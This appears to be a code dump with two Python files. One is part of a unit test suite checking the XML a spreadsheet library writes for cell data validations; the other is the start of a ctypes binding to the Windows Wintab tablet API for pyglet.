exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_15(self):
"""
Test 15,16 Integer <= 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'less than or equal to',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="lessThanOrEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_16(self):
"""
Test 15,16 Integer <= 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '<=',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="lessThanOrEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_17(self):
"""
Test 17 Integer between 1 and 10 (same as test 1) + Ignore blank off.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'ignore_blank': 0,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_18(self):
"""
Test 18 Integer between 1 and 10 (same as test 1) + Error style == warning.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'error_type': 'warning',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" errorStyle="warning" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_19(self):
"""
Test 19 Integer between 1 and 10 (same as test 1) + Error style == info.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'error_type': 'information',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" errorStyle="information" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_20(self):
"""
Test 20 Integer between 1 and 10 (same as test 1)
+ input title.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="Input title January" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_21(self):
"""
Test 21 Integer between 1 and 10 (same as test 1)
+ input title.
+ input message.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
'input_message': 'Input message February',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="Input title January" prompt="Input message February" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_22(self):
"""
Test 22 Integer between 1 and 10 (same as test 1)
+ input title.
+ input message.
+ error title.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
'input_message': 'Input message February',
'error_title': 'Error title March',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" errorTitle="Error title March" promptTitle="Input title January" prompt="Input message February" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_23(self):
"""
Test 23 Integer between 1 and 10 (same as test 1)
+ input title.
+ input message.
+ error title.
+ error message.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
'input_message': 'Input message February',
'error_title': 'Error title March',
'error_message': 'Error message April',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" errorTitle="Error title March" error="Error message April" promptTitle="Input title January" prompt="Input message February" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_24(self):
"""
Test 24 Integer between 1 and 10 (same as test 1)
+ input title.
+ input message.
+ error title.
+ error message.
- input message box.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
'input_message': 'Input message February',
'error_title': 'Error title March',
'error_message': 'Error message April',
'show_input': 0,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showErrorMessage="1" errorTitle="Error title March" error="Error message April" promptTitle="Input title January" prompt="Input message February" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_25(self):
"""
Test 25 Integer between 1 and 10 (same as test 1)
+ input title.
+ input message.
+ error title.
+ error message.
- input message box.
- error message box.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
'input_message': 'Input message February',
'error_title': 'Error title March',
'error_message': 'Error message April',
'show_input': 0,
'show_error': 0,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" errorTitle="Error title March" error="Error message April" promptTitle="Input title January" prompt="Input message February" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_26(self):
"""
Test 26 'Any' shouldn't produce a DV record if there are no messages.
"""
self.worksheet.data_validation('B5', {'validate': 'any'})
self.worksheet._write_data_validations()
exp = ''
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_data_validations_27(self):
"""
Test 27 Decimal = 1.2345
"""
self.worksheet.data_validation('B5', {'validate': 'decimal',
'criteria': '==',
'value': 1.2345,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="decimal" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1.2345</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_28(self):
"""
Test 28 List = a,bb,ccc
"""
self.worksheet.data_validation('B5', {'validate': 'list',
'source': ['a', 'bb', 'ccc'],
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>"a,bb,ccc"</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_29(self):
"""
Test 29 List = a,bb,ccc, No dropdown
"""
self.worksheet.data_validation('B5', {'validate': 'list',
'source': ['a', 'bb', 'ccc'],
'dropdown': 0,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="list" allowBlank="1" showDropDown="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>"a,bb,ccc"</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_30(self):
"""
Test 30 List = $D$1:$D$5
"""
self.worksheet.data_validation('A1:A1', {'validate': 'list',
'source': '=$D$1:$D$5',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="A1"><formula1>$D$1:$D$5</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_31(self):
"""
Test 31 Date = 39653 (2008-07-24)
"""
self.worksheet.data_validation('B5', {'validate': 'date',
'criteria': '==',
'value': date(2008, 7, 24),
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="date" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>39653</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_32(self):
"""
Test 32 Date = 2008-07-25T
"""
self.worksheet.data_validation('B5', {'validate': 'date',
'criteria': '==',
'value': date(2008, 7, 25),
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="date" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>39654</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_33(self):
"""
Test 33 Date between ranges.
"""
self.worksheet.data_validation('B5', {'validate': 'date',
'criteria': 'between',
'minimum': date(2008, 1, 1),
'maximum': date(2008, 12, 12),
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="date" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>39448</formula1><formula2>39794</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_34(self):
"""
Test 34 Time = 0.5 (12:00:00)
"""
self.worksheet.data_validation('B5:B5', {'validate': 'time',
'criteria': '==',
'value': time(12),
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="time" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>0.5</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_35(self):
"""
Test 35 Time = T12:00:00
"""
self.worksheet.data_validation('B5', {'validate': 'time',
'criteria': '==',
'value': time(12, 0, 0),
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="time" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>0.5</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_36(self):
"""
Test 36 Custom == 10.
"""
self.worksheet.data_validation('B5', {'validate': 'custom',
'criteria': '==',
'value': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="custom" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>10</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_37(self):
"""
Test 37 Check the row/col processing: single A1 style cell.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_38(self):
"""
Test 38 Check the row/col processing: single A1 style range.
"""
self.worksheet.data_validation('B5:B10', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5:B10"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_39(self):
"""
Test 39 Check the row/col processing: single (row, col) style cell.
"""
self.worksheet.data_validation(4, 1, 4, 1, {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_40(self):
"""
Test 40 Check the row/col processing: single (row, col) style range.
"""
self.worksheet.data_validation(4, 1, 9, 1, {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5:B10"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_41(self):
"""
Test 41 Check the row/col processing: multiple (row, col) style cells.
"""
self.worksheet.data_validation(4, 1, 4, 1, {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'other_cells': [[4, 3, 4, 3]],
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5 D5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_42(self):
"""
Test 42 Check the row/col processing: multiple (row, col) style cells.
"""
self.worksheet.data_validation(4, 1, 4, 1, {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'other_cells': [[6, 1, 6, 1], [8, 1, 8, 1]],
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5 B7 B9"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_43(self):
"""
Test 43 Check the row/col processing: multiple (row, col) style cells.
"""
self.worksheet.data_validation(4, 1, 8, 1, {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'other_cells': [[3, 3, 3, 3]],
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5:B9 D4"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_44(self):
"""
Test 44 Multiple validations.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '>',
'value': 10,
})
self.worksheet.data_validation('C10', {'validate': 'integer',
'criteria': '<',
'value': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="2"><dataValidation type="whole" operator="greaterThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>10</formula1></dataValidation><dataValidation type="whole" operator="lessThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="C10"><formula1>10</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_45(self):
"""
Test 45 Test 'any' with input messages.
"""
self.worksheet.data_validation('B5', {'validate': 'any',
'input_title': 'Input title January',
'input_message': 'Input message February',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="Input title January" prompt="Input message February" sqref="B5"/></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_46(self):
"""
Test 46 Date between ranges with formulas.
"""
self.worksheet.data_validation('B5', {'validate': 'date',
'criteria': 'between',
'minimum': date(2018, 1, 1),
'maximum': '=TODAY()',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="date" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>43101</formula1><formula2>TODAY()</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
|
py | 1a3452308d0432333fb50b6ccbd5ff3430b290cb | #!/usr/bin/python
# $Id:$
import ctypes
import pyglet
lib = ctypes.windll.wintab32
LONG = ctypes.c_long
BOOL = ctypes.c_int
UINT = ctypes.c_uint
WORD = ctypes.c_uint16
DWORD = ctypes.c_uint32
WCHAR = ctypes.c_wchar
FIX32 = DWORD
WTPKT = DWORD
LCNAMELEN = 40
class AXIS(ctypes.Structure):
_fields_ = (
('axMin', LONG),
('axMax', LONG),
('axUnits', UINT),
('axResolution', FIX32)
)
def get_scale(self):
return 1 / float(self.axMax - self.axMin)
def get_bias(self):
return -self.axMin
class ORIENTATION(ctypes.Structure):
_fields_ = (
('orAzimuth', ctypes.c_int),
('orAltitude', ctypes.c_int),
('orTwist', ctypes.c_int)
)
class ROTATION(ctypes.Structure):
_fields_ = (
('roPitch', ctypes.c_int),
('roRoll', ctypes.c_int),
('roYaw', ctypes.c_int),
)
class LOGCONTEXT(ctypes.Structure):
_fields_ = (
('lcName', WCHAR * LCNAMELEN),
('lcOptions', UINT),
('lcStatus', UINT),
('lcLocks', UINT),
('lcMsgBase', UINT),
('lcDevice', UINT),
('lcPktRate', UINT),
('lcPktData', WTPKT),
('lcPktMode', WTPKT),
('lcMoveMask', WTPKT),
('lcBtnDnMask', DWORD),
('lcBtnUpMask', DWORD),
('lcInOrgX', LONG),
('lcInOrgY', LONG),
('lcInOrgZ', LONG),
('lcInExtX', LONG),
('lcInExtY', LONG),
('lcInExtZ', LONG),
('lcOutOrgX', LONG),
('lcOutOrgY', LONG),
('lcOutOrgZ', LONG),
('lcOutExtX', LONG),
('lcOutExtY', LONG),
('lcOutExtZ', LONG),
('lcSensX', FIX32),
('lcSensY', FIX32),
('lcSensZ', FIX32),
('lcSysMode', BOOL),
('lcSysOrgX', ctypes.c_int),
('lcSysOrgY', ctypes.c_int),
('lcSysExtX', ctypes.c_int),
('lcSysExtY', ctypes.c_int),
('lcSysSensX', FIX32),
('lcSysSensY', FIX32),
)
# Custom packet format with fields
# PK_CHANGED
# PK_CURSOR
# PK_BUTTONS
# PK_X
# PK_Y
# PK_Z
# PK_NORMAL_PRESSURE
# PK_TANGENT_PRESSURE
# PK_ORIENTATION (check for tilt extension instead)?
class PACKET(ctypes.Structure):
_fields_ = (
('pkChanged', WTPKT),
('pkCursor', UINT),
('pkButtons', DWORD),
('pkX', LONG),
('pkY', LONG),
('pkZ', LONG),
('pkNormalPressure', UINT),
('pkTangentPressure', UINT),
('pkOrientation', ORIENTATION),
)
PK_CONTEXT = 0x0001 # reporting context
PK_STATUS = 0x0002 # status bits
PK_TIME = 0x0004 # time stamp
PK_CHANGED = 0x0008 # change bit vector
PK_SERIAL_NUMBER = 0x0010 # packet serial number
PK_CURSOR = 0x0020 # reporting cursor
PK_BUTTONS = 0x0040 # button information
PK_X = 0x0080 # x axis
PK_Y = 0x0100 # y axis
PK_Z = 0x0200 # z axis
PK_NORMAL_PRESSURE = 0x0400 # normal or tip pressure
PK_TANGENT_PRESSURE = 0x0800 # tangential or barrel pressure
PK_ORIENTATION = 0x1000 # orientation info: tilts
PK_ROTATION = 0x2000 # rotation info; 1.1
TU_NONE = 0
TU_INCHES = 1
TU_CENTIMETERS = 2
TU_CIRCLE = 3
# messages
WT_DEFBASE = 0x7ff0
WT_MAXOFFSET = 0xf
WT_PACKET = 0 # remember to add base
WT_CTXOPEN = 1
WT_CTXCLOSE = 2
WT_CTXUPDATE = 3
WT_CTXOVERLAP = 4
WT_PROXIMITY = 5
WT_INFOCHANGE = 6
WT_CSRCHANGE = 7
# system button assignment values
SBN_NONE = 0x00
SBN_LCLICK = 0x01
SBN_LDBLCLICK = 0x02
SBN_LDRAG = 0x03
SBN_RCLICK = 0x04
SBN_RDBLCLICK = 0x05
SBN_RDRAG = 0x06
SBN_MCLICK = 0x07
SBN_MDBLCLICK = 0x08
SBN_MDRAG = 0x09
# for Pen Windows
SBN_PTCLICK = 0x10
SBN_PTDBLCLICK = 0x20
SBN_PTDRAG = 0x30
SBN_PNCLICK = 0x40
SBN_PNDBLCLICK = 0x50
SBN_PNDRAG = 0x60
SBN_P1CLICK = 0x70
SBN_P1DBLCLICK = 0x80
SBN_P1DRAG = 0x90
SBN_P2CLICK = 0xA0
SBN_P2DBLCLICK = 0xB0
SBN_P2DRAG = 0xC0
SBN_P3CLICK = 0xD0
SBN_P3DBLCLICK = 0xE0
SBN_P3DRAG = 0xF0
HWC_INTEGRATED = 0x0001
HWC_TOUCH = 0x0002
HWC_HARDPROX = 0x0004
HWC_PHYSID_CURSORS = 0x0008 # 1.1
CRC_MULTIMODE = 0x0001 # 1.1
CRC_AGGREGATE = 0x0002 # 1.1
CRC_INVERT = 0x0004 # 1.1
WTI_INTERFACE = 1
IFC_WINTABID = 1
IFC_SPECVERSION = 2
IFC_IMPLVERSION = 3
IFC_NDEVICES = 4
IFC_NCURSORS = 5
IFC_NCONTEXTS = 6
IFC_CTXOPTIONS = 7
IFC_CTXSAVESIZE = 8
IFC_NEXTENSIONS = 9
IFC_NMANAGERS = 10
IFC_MAX = 10
WTI_STATUS = 2
STA_CONTEXTS = 1
STA_SYSCTXS = 2
STA_PKTRATE = 3
STA_PKTDATA = 4
STA_MANAGERS = 5
STA_SYSTEM = 6
STA_BUTTONUSE = 7
STA_SYSBTNUSE = 8
STA_MAX = 8
WTI_DEFCONTEXT = 3
WTI_DEFSYSCTX = 4
WTI_DDCTXS = 400 # 1.1
WTI_DSCTXS = 500 # 1.1
CTX_NAME = 1
CTX_OPTIONS = 2
CTX_STATUS = 3
CTX_LOCKS = 4
CTX_MSGBASE = 5
CTX_DEVICE = 6
CTX_PKTRATE = 7
CTX_PKTDATA = 8
CTX_PKTMODE = 9
CTX_MOVEMASK = 10
CTX_BTNDNMASK = 11
CTX_BTNUPMASK = 12
CTX_INORGX = 13
CTX_INORGY = 14
CTX_INORGZ = 15
CTX_INEXTX = 16
CTX_INEXTY = 17
CTX_INEXTZ = 18
CTX_OUTORGX = 19
CTX_OUTORGY = 20
CTX_OUTORGZ = 21
CTX_OUTEXTX = 22
CTX_OUTEXTY = 23
CTX_OUTEXTZ = 24
CTX_SENSX = 25
CTX_SENSY = 26
CTX_SENSZ = 27
CTX_SYSMODE = 28
CTX_SYSORGX = 29
CTX_SYSORGY = 30
CTX_SYSEXTX = 31
CTX_SYSEXTY = 32
CTX_SYSSENSX = 33
CTX_SYSSENSY = 34
CTX_MAX = 34
WTI_DEVICES = 100
DVC_NAME = 1
DVC_HARDWARE = 2
DVC_NCSRTYPES = 3
DVC_FIRSTCSR = 4
DVC_PKTRATE = 5
DVC_PKTDATA = 6
DVC_PKTMODE = 7
DVC_CSRDATA = 8
DVC_XMARGIN = 9
DVC_YMARGIN = 10
DVC_ZMARGIN = 11
DVC_X = 12
DVC_Y = 13
DVC_Z = 14
DVC_NPRESSURE = 15
DVC_TPRESSURE = 16
DVC_ORIENTATION = 17
DVC_ROTATION = 18 # 1.1
DVC_PNPID = 19 # 1.1
DVC_MAX = 19
WTI_CURSORS = 200
CSR_NAME = 1
CSR_ACTIVE = 2
CSR_PKTDATA = 3
CSR_BUTTONS = 4
CSR_BUTTONBITS = 5
CSR_BTNNAMES = 6
CSR_BUTTONMAP = 7
CSR_SYSBTNMAP = 8
CSR_NPBUTTON = 9
CSR_NPBTNMARKS = 10
CSR_NPRESPONSE = 11
CSR_TPBUTTON = 12
CSR_TPBTNMARKS = 13
CSR_TPRESPONSE = 14
CSR_PHYSID = 15 # 1.1
CSR_MODE = 16 # 1.1
CSR_MINPKTDATA = 17 # 1.1
CSR_MINBUTTONS = 18 # 1.1
CSR_CAPABILITIES = 19 # 1.1
CSR_TYPE = 20 # 1.2
CSR_MAX = 20
WTI_EXTENSIONS = 300
EXT_NAME = 1
EXT_TAG = 2
EXT_MASK = 3
EXT_SIZE = 4
EXT_AXES = 5
EXT_DEFAULT = 6
EXT_DEFCONTEXT = 7
EXT_DEFSYSCTX = 8
EXT_CURSORS = 9
EXT_MAX = 109 # Allow 100 cursors
CXO_SYSTEM = 0x0001
CXO_PEN = 0x0002
CXO_MESSAGES = 0x0004
CXO_MARGIN = 0x8000
CXO_MGNINSIDE = 0x4000
CXO_CSRMESSAGES = 0x0008 # 1.1
# context status values
CXS_DISABLED = 0x0001
CXS_OBSCURED = 0x0002
CXS_ONTOP = 0x0004
# context lock values
CXL_INSIZE = 0x0001
CXL_INASPECT = 0x0002
CXL_SENSITIVITY = 0x0004
CXL_MARGIN = 0x0008
CXL_SYSOUT = 0x0010
# packet status values
TPS_PROXIMITY = 0x0001
TPS_QUEUE_ERR = 0x0002
TPS_MARGIN = 0x0004
TPS_GRAB = 0x0008
TPS_INVERT = 0x0010 # 1.1
TBN_NONE = 0
TBN_UP = 1
TBN_DOWN = 2
PKEXT_ABSOLUTE = 1
PKEXT_RELATIVE = 2
# Extension tags.
WTX_OBT = 0 # Out of bounds tracking
WTX_FKEYS = 1 # Function keys
WTX_TILT = 2 # Raw Cartesian tilt; 1.1
WTX_CSRMASK = 3 # select input by cursor type; 1.1
WTX_XBTNMASK = 4 # Extended button mask; 1.1
WTX_EXPKEYS = 5 # ExpressKeys; 1.3
def wtinfo(category, index, buffer):
size = lib.WTInfoW(category, index, None)
assert size <= ctypes.sizeof(buffer)
lib.WTInfoW(category, index, ctypes.byref(buffer))
return buffer
def wtinfo_string(category, index):
size = lib.WTInfoW(category, index, None)
buffer = ctypes.create_unicode_buffer(size)
lib.WTInfoW(category, index, buffer)
return buffer.value
def wtinfo_uint(category, index):
buffer = UINT()
lib.WTInfoW(category, index, ctypes.byref(buffer))
return buffer.value
def wtinfo_word(category, index):
buffer = WORD()
lib.WTInfoW(category, index, ctypes.byref(buffer))
return buffer.value
def wtinfo_dword(category, index):
buffer = DWORD()
lib.WTInfoW(category, index, ctypes.byref(buffer))
return buffer.value
def wtinfo_wtpkt(category, index):
buffer = WTPKT()
lib.WTInfoW(category, index, ctypes.byref(buffer))
return buffer.value
def wtinfo_bool(category, index):
buffer = BOOL()
lib.WTInfoW(category, index, ctypes.byref(buffer))
return bool(buffer.value)
class Device:
def __init__(self, index):
self._device = WTI_DEVICES + index
self.name = wtinfo_string(self._device, DVC_NAME).strip()
self.id = wtinfo_string(self._device, DVC_PNPID)
hardware = wtinfo_uint(self._device, DVC_HARDWARE)
phys_cursors = hardware & HWC_PHYSID_CURSORS
n_cursors = wtinfo_uint(self._device, DVC_NCSRTYPES)
first_cursor = wtinfo_uint(self._device, DVC_FIRSTCSR)
self.pressure_axis = wtinfo(self._device, DVC_NPRESSURE, AXIS())
self.cursors = list()
self._cursor_map = dict()
for i in range(n_cursors):
cursor = WintabCursor(self, i + first_cursor)
if not cursor.bogus:
self.cursors.append(cursor)
self._cursor_map[i + first_cursor] = cursor
def open(self, window):
return DeviceInstance(self, window)
class DeviceInstance(pyglet.event.EventDispatcher):
def __init__(self, device, window, msg_base=WT_DEFBASE):
# Just use system context, for similarity w/ os x and xinput.
# WTI_DEFCONTEXT detaches mouse from tablet, which is nice, but not
# possible on os x afiak.
self.device = device
self.window = window
self.context_info = context_info = LOGCONTEXT()
wtinfo(WTI_DEFSYSCTX, 0, context_info)
context_info.lcMsgBase = msg_base
context_info.lcOptions |= CXO_MESSAGES
# If you change this, change definition of PACKET also.
context_info.lcPktData = (
PK_CHANGED | PK_CURSOR | PK_BUTTONS | PK_X | PK_Y | PK_Z |
PK_NORMAL_PRESSURE | PK_TANGENT_PRESSURE | PK_ORIENTATION)
context_info.lcPktMode = 0 # All absolute
self._context = lib.WTOpenW(window._hwnd,
ctypes.byref(context_info), True)
if not self._context:
raise Exception("Couldn't open context")
window._event_handlers[msg_base + WT_PACKET] = self._event_wt_packet
window._event_handlers[msg_base + WT_PROXIMITY] = \
self._event_wt_proximity
